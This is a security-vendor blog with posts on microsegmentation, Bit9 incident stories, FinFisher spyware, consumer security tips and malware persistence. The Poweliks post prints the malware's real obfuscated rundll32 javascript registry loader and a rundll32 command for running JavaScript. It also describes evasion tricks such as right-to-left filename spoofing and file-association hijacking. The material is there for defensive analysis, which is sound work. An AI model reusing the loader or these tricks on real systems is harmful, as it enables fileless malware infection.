The Lazy Genius

Security News & Brain Dumps from Xavier Ashe, a Bit9 Client Partner

  • Subscribe

  • Xavier’s tweets

    Error: Twitter did not respond. Please wait a few minutes and refresh this page.

  • Goodreads

  • Enter your email address to follow this blog and receive notifications of new posts by email.

    Join 1,186 other followers

  • Blog Stats

    • 52,963 hits

What is Microsegmentation?

Posted by Xavier Ashe on June 24, 2016

Last week Gartner published the Top 10 Technologies for Information Security in 2016.  In that list, they include microsegmentation, a term many security professionals are unaware of.  This is exciting for me at Drawbridge Networks, since PathProtect is the only technology on the market that provides microsegmentation for the entire enterprise, securing traffic workstation to workstation, workstations to server, and server to server.

To put it simply, microsegmentation is ability to do two things:

  1. Identify network traffic based on something more than layer 4 information, i.e. user, application, etc.
  2. Control network traffic using that additional information in a policy driven manner.

The biggest need for this technology is for east/west traffic, i.e. not traversing a firewall, router, and/or switch.

First, some history

When TCP/IP and ethernet was gaining a foothold as being the networking platform of choice over token ring and others, it was easy to map OSI layers to devices (need an OSI refresher?).  Hubs were layer 1, switches were layer 2, routers were layer 3, and firewalls were layer 4.  If you wanted to divide a network into two IP segments, you used a router.  If you wanted to segment your network by port, you used a firewall.  If you wanted to move a computer from one network segment to another, you walked down to the communication closet, and moved the cable from one switch to another.

Then enters the Virtual Local Area Network (VLAN) in the 90s.  Broadcast storms were a real pain and segmenting with routers was cost limiting.  VLANs were a solution to this broadcast problem, but the new flexibility and ease of being able to segment on the fly became quite popular.  This popularity bred multifunction network devices such as layer 3 switches.

By the late 90s, we had cost effective switches with routing capabilities.  The security capabilities of these multifunction devices increased to include Access Control Lists (ACLs), Private VLANs, etc. Creating network segments was no longer bounded by cost.  Routers also started expanding past layer 3 to be able to do port based ACLs.  As we entered into the 2000s, stateful firewalls were also being built into single multifunction devices.

All of this was a great advancement for security, but even today many enterprises are still stuck segmenting at OSI layer 4 and below with just IP and port.  Essentially, all network architecture and segmentation schemes are built with this limitation as a core design principle.  Security innovation continued but instead of advancing segmentation techniques, network security vendors seemed to change focus their focus to layer 7 inspection and building “appliances”.  Unfortunately, you cannot have an appliance everywhere in your network.

Beyond Layer 4 – How to Get Microsegmentation

There are many shortcomings to only using IP and port as way to segment your network for security.  The primary tool used by most today, VLANs, was never built with security in mind, only to reduce broadcast traffic.  ACLs help control traffic, but most enterprises have decades old ACLs that are costly to manage.  Attackers are able to move around from endpoint to workstation with impunity.  We have to control the east/west traffic flow to effectively secure our networks.

Here are the current technologies that enable microsegmentation:


As the popularity of OS virtualization developed, hardware based networking devices were a limiting factor in the flexibility and scalability virtualization had to offer.  From that need sprung Network Function Virtualization or NFV.

NVF is a new label on what has been developing for the last 10-15 years, which is building software that provides the same functionality as networking devices.  In 2012 the European Telecommunications Standards Institute (ETSI) dedicated a group to start producing standards for NFV.

Because of the flexibility a virtual networking device can offer, microsegmentation has been added to that list of capabilities.  The most prominent method is to “tag” traffic with a proprietary tag.  Then other NVF devices from that vendor can respond to that tag to control the network traffic according to a policy.

Note: ETSI has not published a standard or draft for microsegmentation , so each NVF vendor will have implementation differences.


Paralleling the development of NVF was a movement to get beyond centralized network orchestration and have true centralized management with a programmatic interface.  A new concept emerged: separating the control plane, the basic switching/routing functions, from the management plane.  This separation of these logical functions is what is known by Software Defined Networking (SDN) today.

As the last decade was coming to a close, SDN gained its footing.  2011 saw the founding of the Open Networking Foundation and the first release of OpenFlow. This standard has paved the way to make multiplatform SDN a reality.  That hasn’t stopped some big vendors from creating their own “standard”, like Cisco’s Open Network Environment.

SDN has a lot of promise, including the ability to perform microsegmentation in a similar manner as the NVF implementations.  However, SDN is not an easy thing to implement.  The value that it brings makes it worth the cost if you are a cloud or data center provider.  For most enterprises, the cost of implementation far outweighs the benefits.

Enterprise Microsegmentation

NFV and SDN are promising technologies and are currently reshaping data centers. However, attackers often target endpoint workstations as an initial point of compromise. Spear phishing emails with malicious links and attachments are used to gain a foothold, and then attackers move laterally from workstation to workstation in search of valuable hosts such as those used by DBAs or IT Systems Administrators.

Microsegmentation of endpoint workstations might prevent those infections from spreading laterally, but there are definitive shortcomings when microsegmentation is implemented in the network using technologies like SDN.  There are certain things that you cannot see from the network, like what process sent that network traffic?  What user started that process?

PathProtect takes a different approach.  Instead of trying to reengineer your entire network, PathProtect uses endpoint agents to understand the context of the network data. These endpoint agents are easy to deploy, and provide information about all of the lateral communications going on in the network as well as the process and user context associated with them.  Then, using a policy based engine, PathProtect can control who can do what, performing enforcement at each endpoint.  This way, PathProtect decouples the network policy from the physical architecture of the network itself, allowing for instant reconfiguration of segments on the fly.

PathProtect uses mutual endpoint authorization to ensure that the client sending the traffic is authorized to do so and that the server is authorized to accept the traffic.  This can provide your enterprise with a default-deny posture.  If an attacker were to walk into your office and plug in his own laptop, no workstation or server would respond.

Just like a drawbridge, both sides must be open to allow traffic to pass.


Gartner has brought to light the new security concept of microsegmentation and highlighted its importance. There’s no need to invest in network rearchitecture to start controlling your east/west traffic.  For a fraction of the time, and a fraction of the price, you can implement microsegmentation today.


Posted in PathProtect | Leave a Comment »

Following Poweliks Strike, Custom Bit9 Rule Offers Key Insight and Blocks Infection

Posted by Xavier Ashe on January 21, 2015

This blog post I wrote for the Bit9 Blog and was published on January 21st, 2015.


I love to hear stories about how our customers use our products. I previously wrote about a global services firm that used Bit9 to connect the dots to get to the bottom of an Internet Explorer exploit. This same company sent me the following story to show a particularly useful rule they created in Bit9:

“We wound up getting hit by a Poweliks variant pretty badly shortly after I originally emailed you, where 44 users who were in full lockdown mode had to have their computers reimaged (At that time the majority of anti-malware tools didn’t detect that malware, let alone clean it). Fortunately, we identified what was happening fairly quickly thanks to the Bit9 agent, and we were able to put a custom rule in place in Bit9 to identify users who were infected or were in the initial stage of infection. Without Bit9 installed we wouldn’t have even been able to identify who was infected, let alone prevent the payload from executing.”

Somewhere along the way, the computers that had to be reimaged acquired the following registry entry:

rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;eval(“epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*”.replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);})) –Embedding

Once the above code executed, it would

  1. Spawn an instance of PowerShell
  2. Spawn a dllhost (or many dllhosts)
  3. Connect to up to five different Russian IP addresses, and then it would
  4. Initiate the usual malware behavior

Pretty clever!

I wouldn’t have guessed that rundll32 would be able to execute Javascript code, but if you are curious to see for yourself, try executing the following:

rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;alert(‘RaawwwrrrrRRrrr’);


Fortunately, rundll32.exe doesn’t usually launch PowerShell, so we were able to quickly identify infected users by using the following Bit9 rule:


The rule would then block PowerShell from executing, thereby preventing the computer from becoming completely infected. We then ran a report based on files being blocked by the rule to identify the infected users.

In the end, the exercise provided the fuel that I needed to convince management to approve an installation of a Carbon Black server for even greater visibility.


Posted in Bit9 | Leave a Comment »

Scan-based Forensics Solutions Are for Cavemen

Posted by Xavier Ashe on January 21, 2015

This blog post I wrote for the Bit9 Blog and was published on January 15, 2015.


I had the opportunity to work with a global services firm that had some problems with malware on machines that were running Bit9. They were running Bit9 in “High Enforcement” mode, so the infection was being blocked, but they wanted to get to the source of the attack, since it was creating some noise in their SIEM.

At that point the customer only had a few clues. They knew there was something creating a task in:

c:\windows\system32\tasks, that was named with a GUID (e.g., {462BD9BA-4D27-EA09-F2AC-704C4DDA8D16}).

That task would then attempt to run regsvr32.exe to register a dll file in c:\windows\system32. The dll files they encountered were named using five to six alpha characters. In one example, the ssaxxo.dll file dropped into the c:\windows\system32 directory.

The files seemed to have unique hashes, but they were all detected as known malware. When the dll file got dropped into the C:\windows\system32 directory, another file with a different name appears in the c:\windows\syswow64 folder as well. Both of the dll files appear to have been generated by rundll32.exe.

It was confirmed that their antivirus of choice did not detect this threat, while Bit9 did.

However, without more context, all they knew was that they had a vulnerability somewhere. The question was: “Where?”

At this point, the customer sent us the logs to review and collaboratively find the source of the exploit. Our Bit9 Threat Research Team jumped in, and it didn’t take long to assess the issue.

Internet Explorer was being exploited.

An IE exploit was used to drop the first dll file, create the scheduled task, and then pass the dll file to rundll32.exe. Rundll32 then created the file they discovered, and the scheduled task attempts to register it via regsvr32.exe, which is blocked by Bit9. The scheduled task is set to keep trying every 10 minutes.

As we were going through this exercise, the customer wished they also were running Carbon Black.

That’s because he knew from a recent demo that Carbon Black can do this type of analysis in seconds. There is no need to review log files to connect the dots; Carbon Black assembles that data for you and is available with just a few clicks. Plus, with Carbon Black, the customer would have known which IP address was exploiting them.

This ability to connect the dots is because the Bit9 Security Platform and Carbon Black operate in real time at the kernel layer. Products that merely perform file scans cannot deliver this level of visibility.

I think back on my days doing forensics on disk images and it seems like caveman days. It still surprises me that organizations are still buying scan-based forensic software in what is very much a real-time threat landscape.

Posted in Bit9, Carbon Black | 1 Comment »

Interesting Read: ParanoiDF – PDF Analysis & Password Cracking Tool

Posted by Xavier Ashe on August 13, 2014

As I browse the internet, I find security news that I find interesting. Here is one such article:

ParanoiDF – PDF Analysis & Password Cracking Tool

Original article from Darknet – The Darkside
Original article posted on August 13, 2014 at 11:15AM

Posted in Interesting Links | Tagged: , , , | Leave a Comment »

Interesting Read: Your PC or laptop may have a backdoor enabled by default, millions do

Posted by Xavier Ashe on August 13, 2014

As I browse the internet, I find security news that I find interesting. Here is one such article:

Your PC or laptop may have a backdoor enabled by default, millions do

Computrace software, which is enabled by default on millions of PCs, could allow attacker to remotely wipe the hard drive. Researchers described the "backdoor" in BIOS/UEFI, as well as how it can be exploited at Black Hat USA. Although the suggested threat mitigation is the deactive Computrace, that’s not always possible.

Original article from Computerworld Blogs – Security
Original article posted on August 13, 2014 at 10:03AM

Posted in Interesting Links | Tagged: , , , | Leave a Comment »

Interesting Read: How Hackable Is Your Car? Consult This Handy Chart

Posted by Xavier Ashe on August 6, 2014

As I browse the internet, I find security news that I find interesting. Here is one such article:

How Hackable Is Your Car? Consult This Handy Chart

Last year, when hackers Charlie Miller and Chris Valasek showed they could hijack the steering and brakes of a Ford Escape and a Toyota Prius with nothing but laptops connected to the cars, they raised two questions: Could hackers perform the same tricks wirelessly, or even over the Internet? And even more pressing: Is your […]

Original article from WIRED » Threat Level
Original article posted on August 06, 2014 at 06:30AM

Posted in Interesting Links | Tagged: , , , | Leave a Comment »

Interesting Read: Redefining “advanced persistent” adversaries?

Posted by Xavier Ashe on July 29, 2014

As I browse the internet, I find security news that I find interesting. Here is one such article:

Redefining “advanced persistent” adversaries?

Since the beginning of 2013, the popular press has documented many major information security intrusions and attacks. These stories have included veiled hints that the amount of sophistication suggests the intrusions are perpetrated by “advanced persistent” adversaries who must be sponsored by nation-states. Dell SecureWorks Counter Threat Unit™ (CTU) researchers have drawn a different conclusion based on evidence left behind from recent persistent intrusions in well-secured organizations.

Original article from Research Blog | Dell SecureWorks
Original article posted on July 29, 2014 at 12:03PM

Posted in Interesting Links | Tagged: , , | Leave a Comment »

Interesting Read: Attackers Exploiting Flaws in Elasticsearch to Use Amazon’s Cloud Service for DDoS Attacks (July 28, 2014)

Posted by Xavier Ashe on July 29, 2014

As I browse the internet, I find security news that I find interesting. Here is one such article:

Attackers Exploiting Flaws in Elasticsearch to Use Amazon’s Cloud Service for DDoS Attacks (July 28, 2014)

Attackers have discovered a way to use Amazon cloud services to launch distributed denial-of-service (DDoS) attacks on other websites by exploiting flaws in Elasticsearch, an open-source analytics application…….

Original article from SANS NewsBites
Original article posted on July 29, 2014 at 02:36PM

Posted in Interesting Links | Tagged: , , | Leave a Comment »

Interesting Read: Android busted for carrying Fake ID: OS doesn’t check who really made that ‘Adobe’ plugin

Posted by Xavier Ashe on July 29, 2014

As I browse the internet, I find security news that I find interesting. Here is one such article:

Android busted for carrying Fake ID: OS doesn’t check who really made that ‘Adobe’ plugin

Versions 2.1 to 4.4 affected – is your gadget patched?

Google Android allows malware to masquerade as legit, trusted apps thanks to weaknesses in the way the operating system checks digital certificates of authenticity.…

from The Register – Security
posted on July 29, 2014 at 05:43PM via IFTTT

Posted in Interesting Links | Tagged: , , , | Leave a Comment »

Security Tips for the New Year for the non-Security Geek

Posted by Xavier Ashe on January 2, 2014

Welcome to 2014 everyone.  This year is going to be better than the last one, right?!  Well, to set you up for success, I suggest you do the things listed below.  Skip to the List.  Most folks, unless you’ve already been a victim of identity theft, have a “probably won’t happen to me” mentality when it comes to security and privacy threats.  Have you ever said:

  • “I don’t have anything to hide.”
  • “Why would hackers target me?  I have no money.”
  • “There’s no way to stop hackers now-a-days, so why try.  I probably won’t be attacked.”

Those rationalizations are all rooted in truth, and if I wasn’t in the security business, I would probably fall right in line with you.  However, I am in the security industry, and I see it all.  I read nearly all the published breach reports.  I have access to tons of unpublished breach information, and I’ve been personally involved in cleaning up several of the high profile breaches this year.

So you would expect me to advise people and companies to SECURE IT ALL!  Well, I think there’s a lot of truth to the third bullet above.  Between government agencies like the NSA & China, organized crime syndication, and that bored teenager down the street, there’s not much you can do to be 100% secure.  It’s impossible to SECURE IT ALL!

What can be done?  I call it “Good Enough Security”.  Follow these steps to figure out what you need to do.  This is the same process I take companies through, and it works just as well on a personal level.

  1. Think about what data you have that could be valuable to hackers, beyond your cash and credit. Your computer can be used to mine Bitcoins, attack websites, and participate in fraud.  Your social networking accounts can be used in fraud, and those passwords are often very similar to the ones used for banking.
  2. Expand the definition of hackers to include ex-boyfriends/girlfriends, teenage kids (yours or otherwise), former and current co-workers, and social networking “friends”. There are governments and foreign elite hackers, but you are also just as likely to be attacked from someone you know.  (Some attacks can be stupid easy.)
  3. Think about how you are vulnerable.  Do you reuse the same password with a number at the end?  Do you use public internet computers or shared wi-fi hotspots?  Do you have a smart phone with no extra security?  Do you have teenagers?

The security buzzwords for the above list are 1) know your assets 2) know the threat and 3) identify vulnerabilities.  It is the core of what we like to call a risk analysis.

Okay, but what about you?  The individual with a laptop, iPhone and iPad, a Facebook account, credit cards and a bank account.  What are some simple ways of setting yourself up for success in the New Year?

  • Change your passwords.  All of them.  Today.  And then,
  • Use Passphrases. There is a lot of research behind it.  “Xavieriscoolerin2014!” is a much better password than “X@v1er2014”.  You can also use the website names in your passphrase, e.g. “IjoinedFacebookin2009.”
  • Save your passwords, but not in the browser.  I would suggest a notebook, if you are low tech.  If you want a good tool, try LastPass.  It can sync password between various devices (including mobile devices), and is much more secure than Chrome or Firefox.
  • Don’t use the same password on different sites.  When a website gets hacked (like Adobe, Facebook, GMail, Twitter, LinkedIn, etc.), those passwords gets added to a big dictionary that are used in future attacks.  There will be more attacks of this nature in 2014, so set yourself up for success now.
  • Add a passcode to your phone.  Of all the security features that allows you to protect your phone, this is the best option.  As long as it’s not a super simple code (1234, 2580, or 4 of the same number), you can pick something easy to type in.
  • Get new credit and debit card numbers.  Call your bank and credit card providers and ask for new digits.  Tell them that this is due to the Target breach and you would like to cancel your current credit card number.  This is a good practice to do about once every year or two.
  • Secure your Android device.  Android has an open platform that fosters innovation, but also allows for being tricked into installing malware.  I suggest Zoner Antivirus.
  • Get a better antivirus.  Do you have the same antivirus that was packaged with your machine?  Go to AV Comparatives to see the best, and worst.  If you are a bit more technical, use the Bit9 Trust Assessment tool to get the best idea of what’s installed on your system.

If you have any other simple security tips, send them my way.  Here’s to having a safe 2014!

Posted in Security | Leave a Comment »

I pulled a Peacock today

Posted by Xavier Ashe on August 8, 2013

As if today wasn’t “exciting” enough, I just broke up a domestic dispute.

I am at a hospital with my wife who is recovering from some surgery. I decided to wonder the halls around 10 pm, looking for a snack. There was this guy following a few feet behind a girl saying things like “What? What am I doing? I’m just walking”. The girl was visibly upset and was telling him to go away, over and over. I watched for a while, acting like I was playing on my phone. I was hoping to see a silly argument, but it was apparent that he was just harassing her.

I walked over and told him, “I think she’s made her self clear. You need to turn around now.” I was prepared for him to get angry and take it out on me, but he just seemed broken. His shoulders slumped and his voice changed.

“But she’s my wife.”

I could see the pain in his eyes. “I’ve been there man. Sometimes it’s better not to push too hard. She needs her space right now”.

He kept repeating, “but she’s my wife” and, “where am I supposed to go?”

“Somewhere else in the hospital. I don’t know what you guys are going through, but she doesn’t want to be around you right now.”

“She’s got my baby in her belly.” He looked down the hallway in the opposite direction, wrestling with something in his mind.

I kept him in still, chatting away to let the girl get some distance. I walked on, hoping that was enough. I didn’t think this was going turn ugly, but your never know.

As I rounded the corner, she reappeared looking for a way out of the building. He started to approach again, but I walked her to the nearest open exit. As we exited, he got closer. I let her leave (I think she was was looking for a place to smoke).

“I don’t know anything about you two, but you are doing nothing but harassing her right now. You could be nicest guy in the world, or you could be violent type. Right now you need to back off.”

There was an intense glare from him. You could see the rage building in his eyes. “Oh shit, here we go” I thought. I put one foot back, leaned back for balance, and prepared for him to go ape shit. Then something broke inside his eyes. His muscles loosen and he looked at his feet. He silently walk outside, but in the opposite direction of the girl.

I noticed a police car in a adjacent building, and walked over. It was a sheriff. I gave him a run down of what was going on and he pulled his car around to the girl. I had to walk half way around the hospital to find a door that was opened. I headed back to my wife’s room.

Did I help or hurt? It’s so hard to tell. My southern upbringing makes me defend the girl, but I wish I could help the guy. He wasn’t a clear asshole or jerk. Things are never that black or white. He didn’t need to be “taught a lesson”. She might have been the biggest bitch in the world. Or, considering where we are, there could be a huge decision that she has to make.

So many possibilities, so many outcomes. I just hope I made the right call.

Funny enough, as I was walking around trying to get back in the hospital, I thought of Joe Peacock’s stories. It made me laugh out loud as I thought, “What would Joe do?” It would have probably involved a Waffle House.

Posted in Personal Note | Leave a Comment »

Cyberespionage Tackle Box: FinFisher Spyware Casts Wide Net

Posted by Xavier Ashe on May 8, 2013

FinFisher’s Global Proliferation: Updated Map

Copyright, The Citizen Lab 2013

EDIT: New information about FinFisher was released by F-Secure on August 30, 2013.

Originally posted on the Bit9 Corporate Blog.

As I reviewed recent headlines, I took note of a company out of the U.K., Gamma International, that makes purpose-built spying tools. Their software offering is called FinFisher (aka FinSpy). The buzz phrase they use is “lawful intercept,” which means that its use should be bound by laws that allow spying in certain circumstances. Personally, I file it under “greyware,” considering it could be used legally or illegally to remotely control or embed cyberespionage tools within benign looking software. So how do organizations secure themselves against these kinds of tools?

Last year Morgan Marquis-Boire, a security researcher at the Citizen Lab at the University of Toronto’s Munk School of Global Affairs, and Bill Marczak, a computer science doctoral student at the University of California, Berkeley, found emails containing surveillance tools traced back to Gamma International. More recently, those researchers found the command-and-control server for FinFisher running in 36 countries. According to Mikko Hypponen of F-Secure, Gamma International even tried to sell FinFisher to the Egyptian Government under former President Mubarak.

As the New York Times reported in March:

Martin J. Muench, a Gamma Group managing director, has said his company does not disclose its customers but that Gamma Group sold its technology to governments only to monitor criminals. He said that it was most frequently used “against pedophiles, terrorists, organized crime, kidnapping and human trafficking.”

But evidence suggests the software is being sold to governments where the potential for abuse is high. “If you look at the list of countries that Gamma is selling to, many do not have a robust rule of law,” Mr. Marquis-Boire said. “Rather than catching kidnappers and drug dealers, it looks more likely that it is being used for politically motivated surveillance.”

FinSpy vs. Mozilla Firefox.

The Citizen Lab released research on the topic a few days ago titled “For Their Eyes Only: The Commercialization of Digital Spying.” The data in this report is shocking in many ways, including a mobile version of FinSpy that follows the same path as its desktop equivalent.

They also have a sample package that realistically masquerades as Mozilla’s Firefox. They copied so many details that Mozilla sent Gamma International a cease-and-desist letter, according to Wired. As you see in the screenshot below, the properties of the executable are identical. How would one ever know the difference? You could rely on virus scanners, but without a sample of the malicious code they won’t be able to detect or stop it.

The tried-and-true security tools that most of us depend on are reactive. You have to wait on security researchers to tear apart samples that they find in the wild to give you reactive protection. It’s the same old cat-and-mouse game that leaves you open to attack.

Fortunately, there is a way to end the game. The Bit9 Trust-based Security Platform takes a different approach by blocking the execution of untrusted files across endpoints and servers. Let’s look through the Citizen Lab’s research paper and see how Bit9 would stop these threats.

  • In the messages sent to Bahrain dissidents, used the “right-to-left override” attack. From the research paper: “The RLO character (U+202e in unicode) controls the positioning of characters in text containing characters flowing from right to left, such as Arabic or Hebrew. The malware appears on a victim’s desktop as ‘exe.Rajab1.jpg’ (for example), along with the default Windows icon for a picture file without thumbnail. But, when the UTF-8 based filename is displayed in ANSI, the name is displayed as ‘gpj.1bajaR.exe.’ Believing that they are opening a harmless ‘.jpg,’ victims are instead tricked into running an executable ‘.exe’ file.”
    • If Bit9 were installed and running in high-enforcement mode, the unknown or untrusted executable would not have executed. Even if you were running Bit9 in block-and-ask mode, the user would be alerted that a program was trying to run something other than a .jpg.
  • In emails sent to the Moroccan citizen media and journalism project Mamfakinch, the payload was in a malicious java file, “adobe.jar.” This file then facilitated the installation of a multi-platform (OSX and Windows) backdoor. On Windows, it writes a number of files, including ZsROY7X.-MP. This file appears to provide the main backdoor functionality. It adds a registry key to ensure the Trojan stays persistent and runs via rundll32.
    • Bit9 has the ability to track and block Java files as it does other executables, but it isn’t turned on by default. So if you had that Java option enabled, Bit9 would keep “adobe.jar” from ever executing. Let’s say you don’t have Java tracking enabled. In that case, “adobe.jar” would execute, writing out the files to the endpoint. Bit9 examines each file for its contents, finding the file “ZsROY7X.-MP” to be executable as DLL. When rundll32.exe is called to load it that execution will be blocked. The Trojan will never be able to execute with Bit9 installed.
  • In an email sent to Ahmed Mansoor, a prominent UAE blogger who was imprisoned, the payload is a malicious document that looks like a Microsoft Word file, but is an RTF file that exploits a stack-based buffer overflow in the RTF format and downloads additional payloads. Using a Windows API, it downloads a second file, which is also a downloader. Then the third stage is where the backdoor is downloaded, “verimportant.doc3.” The file then writes out several files, including “V46lMhsH.shv,” which is run via “rundll32.exe.”
    • This use case has a different point of injection, but the same outcome. In this case, either the second downloader or the backdoor itself would be blocked by Bit9. Since the backdoor wouldn’t execute, cleanup would be relatively easy since it wasn’t able to inject itself into other software.
  • In the use case of the modified version of Firefox, the user would be tricked into installing the wrong version by DNS poisoning, link-jacking, cross-site scripting, clever emails, or other means. The user would then install what looks to be a normally functioning version of Firefox. Infecting an endpoint in this manner tricks the users into accepting changes to his or her system. They know they are installing software, so they are more likely to click “yes” to any security warnings.
    • Companies using Bit9 build a trust-based security approach that ensures any software delivered and executed on an endpoint has been approved in some trusted fashion. Whatever model is deployed, it can prevent “trick the end user” attacks because the malicious version of Firefox is not signed by Mozilla. It would not be able to pass the rigors of a trust-based approach and would not be allowed to execute on the endpoint.

Malware comes in various shapes and sizes, with some written by criminals and others written by private companies. Keeping up with these advanced threats requires a new approach to security. Bit9 ensures that only trusted software can run, as opposed to relying on deep analysis of already-known threats that can take time and money to defend against while still leaving you unsecure. A trust-based approach is the most secure method to ensure your endpoints and servers are not being spied on by foreign governments using products such as FinFisher and FinSpy.

Posted in Bit9, Security | Leave a Comment »

Highlights from the IBM X-Force 2012 Trend and Risk Report

Posted by Xavier Ashe on March 28, 2013

Even though I am no longer an IBMer, this is still a great report to review trends.  The X-Force Blog has posted their highlights, with a link at the bottom to get the full report.  I’ve read through the report and here’s some bits I find interesting.

  • The distribution and installation of malware on end-user systems has been greatly enabled by the use of Web browser exploit kits built specifically for this purpose. Exploit kits first began to appear in 2006 and are provided or sold by their authors to attackers that want to install malware on a large number of systems. They continue to be popular because they provide attackers a turnkey solution for installing malware on end-user systems. Java vulnerabilities have become a key target for exploit kits as attackers take advantage of three key elements: reliable exploitation, unsandboxed code execution, and cross-platform availability across multiple operating systems. Java exploits have become key targets in 2012 and IBM X-Force predicts this attack activity to continue into 2013.
  • The 2012 bank DDoS attacks appear to be coming in part not from infected PCs, but from compromised web servers that reside in high bandwidth data centers. By using security vulnerabilities in CMS systems and other popular web frameworks, the attackers were able to create a botnet of web servers that have a much longer connected uptime, as well as having more bandwidth in general, than home PCs. Because of Section I—Threats > Rising tide of security incidents > ABC’s and DDoS’s this, they were able to use fewer bots to more effectively generate larger amounts of traffic.
  • In addition to new toolkits and botnets of infected web servers, old reliable methods such as amplification attacks are being effectively used to generate high traffic. While amplification attacks such as an Internet Control Message Protocal based (ICMP) “Smurf Attack” have been used for a decade or more, attackers continue to use the same underlying principles to generate much more traffic today. In particular, DNS Amplification has been successful due to the many open or misconfigured DNS resolver servers on the Internet.
  • Malicious code activity overall continues to grow, helped along by the combined efforts of casual attackers, insider threats, cybercrime and Advanced Persistent Threats. Figure 7 demonstrates the “arms race” that exists in
    computer security today, with the number of techniques to compromise systems constantly growing, being countered, and growing again.

Posted in IBM, Security | Leave a Comment »

Bit9 2013 Server Security Survey

Posted by Xavier Ashe on March 26, 2013

Bit9 2013 Server Security Survey Shows Concerns
about Targeted Malware Rising

1,000 IT and Security Pros Worldwide are Less Confident about Stopping Threats

WALTHAM, Mass.—March 21, 2013—Bit9, the leader in Trust-based Security, today announced the results of its second annual server security survey of nearly 1,000 IT and security professionals worldwide. Key findings include:

  1. 52 percent of respondents said targeted malware attacks are their top server security concern, up 15 percent from the prior year.
  2. 25 percent of respondents said their servers were attacked in 2012, up 8 percent.
  3. 12 percent of the survey group ranked “too much administrative effort” required by traditional security solution as a bigger concern than actual attacks. 43 percent of respondents use more than 1 full-time employee to manage server security.

Click here to download the Bit9 2013 Server Security Survey report and the infographic The Truth about Server Security.

“These results highlight the need for greater control in identifying and stopping advanced attacks on valuable server resources—before they execute—while decreasing the security-related administrative workloads of IT and security professionals,” said Brian Hazzard, vice president of product management for Bit9. “The key to securing enterprise servers—both physical and virtual—is to allow only trusted software to execute and prevent all other files from running. That’s how the Bit9 Platform protects our customers’ servers and endpoints against targeted attacks, zero-day threats and all other types of malware.”

Posted in Bit9 | Leave a Comment »

Hackers, too Close to Home

Posted by Xavier Ashe on March 25, 2013

I live in the far outskirts of Atlanta, Georgia.  It’s rural/suburban, with lots of horse farms and country clubs.  You never expect to have bad things happen near you home, myself included.  However, we do have some local drama that has bled in to my domain of information security.  It all started with this:

Acworth Teen Accused of Posting Nude Photos to Porn Sites

Authorities are investigating an Acworth teen who allegedly posted naked photos of at least eight children on pornographic websites, according to a Cobb County criminal warrant.

Interesting.  At this point I find it odd, but not too interesting.  Some kids getting in trouble.  Stupid trouble, but it sounds like this guy is not a pedophile.  Then more information came out.

Police Seek More Victims in Acworth Teen’s Alleged Child Porn Scheme

The Acworth teen who allegedly posted naked photos of at least eight children on pornographic websites created a company to gain the trust of the juveniles.

Cobb County Police Sgt. Dana Pierce said today that authorities believe Harrison High School senior Michael William Cook operated under the company name Maxi Focus Photography between Nov. 1, 2012, and Jan. 1, 2013, the time frame that he allegedly posted to pornographic websites “naked” or “erotic” photos of people that he obtained through fraudulent means.

Okay, now that steps it up a notch.  If true, this guy even got himself a fake business to entice girls.  So he may be more of a predator than I first thought.  At this point, it’s a wild story, but still a local quirky story.  It just happens to be walking distance from my home.  I was reading my security blogs this morning and came across this:

17-year-old arrested for hacking into phones, stealing and distributing explicit images of children

A US teenager has been charged with distributing child pornography he allegedly hacked out of minors’ cellphones with a bogus mobile text ad that installed phone-controlling malware.

According to, Sgt. Pierce claimed that Cook sent text messages to victims from a company called “Maxi Focus Photography”.

When victims clicked on a link in the text message, it installed malware that essentially gave Cook access to all information stored on the phones.

That includes access to victims’ accounts on social network sites, such as Facebook and Twitter, as well as sexually explicit photos stored on the phones.

Cook allegedly downloaded offensive pictures and sent them to pornographic websites, Pierce said.

Now things are getting very interesting.  This is more than just using a fake photography “studio” to convince girls to get naked.  This was a lot more sneaky, if true.  I’ve done security forensics before and they almost always are child porn cases.  For me, I was always helping prove that someone knowingly downloaded child porn, and usually disproving the “It must have been a Virus” defense.

This is different.  If true, my neighbor was hacking into phones and stealing nude photos.  In my line of work, we talk about the various type of threats we have and what are their motivations.  Now we can add perverted 17 year old boys trying to find naked pictures of teenagers.  What if can across your banking info?  Think he’d buy himself a couple of video games?

I can think of several lessons here:

  • Everything on a computer is discoverable.  If you have a naked photo of yourself, it could get posted somewhere.  Those files seem to live forever.
  • This is even more true on phones.  Did you know that many photos are automatically “backed up” onto servers (especially on non-smartphones)?  Things like IM and texting are unsecure and can be read by others?
  • Teach your children about security.  Do you tell your children about dark alleys at night?  Then tell them how to avoid getting attacked on the internet.  Here’s a few good links:
  • Install Anti-Malware on your Smartphone and Tablets. Here are two of my favorite (and they’re free!):

I’ll keep monitoring the situation and see how things evolve.  For this kids sake, I hope it’s not true.  We’ll see how the investigation goes.

Posted in Personal Note, Security | Leave a Comment »

Wipe the Drive! or use Bit9

Posted by Xavier Ashe on March 23, 2013

I just read a great article by Mark Baggett (@MarkBaggett) on the ISC Diary called Wipe the drive! Stealthy Malware Persistence Mechanism – Part 1 and Wipe the drive! Stealthy Malware Persistence – Part 2.  This was from his presentation at Shmoocom 2013.  He shows 4 different methods how malware can stick around even after it’s been “cleaned” by anti-malware products.  I completely agree with his advice: always “Wipe the Drive”.  It’s the only sure fire way to clean the system, but what if you can’t for some reason?  Maybe it’s a traveling employee or an executive at a conference.  Wiping and re-imaging is a costly procedure in most enterprises.

What if you had Bit9 installed?  How would these 4 situations play out?  Let’s go through them.  Bit 9 can be run in three protection modes: Monitor-only with Advanced Treat Indicators (ATIs), Block & Ask, and Block.  If you are running endpoints in Monitor-only mode with ATIs, you would get an alert on your Bit9 console for these actions.   This alert could be acted upon within Bit9 or from your SIEM.  For the other two modes, I’ll explain how each of these would be blocked, since that’s how most of our customers use Bit9.

TECHNIQUE  #1  – File Associations Hijacking

What happens when you click on a .TXT file?   The operating system checks the HKEY_CLASSES_ROOT hive for the associated extension to see what program it should launch.  …

What if the attacker or his malware changes this association?   Instead of launching notepad it tells the OS to launch NOTPAD.EXE.     NOTPAD.EXE is wrapper around the real NOTEPAD.EXE but it also contains a malicious payload.

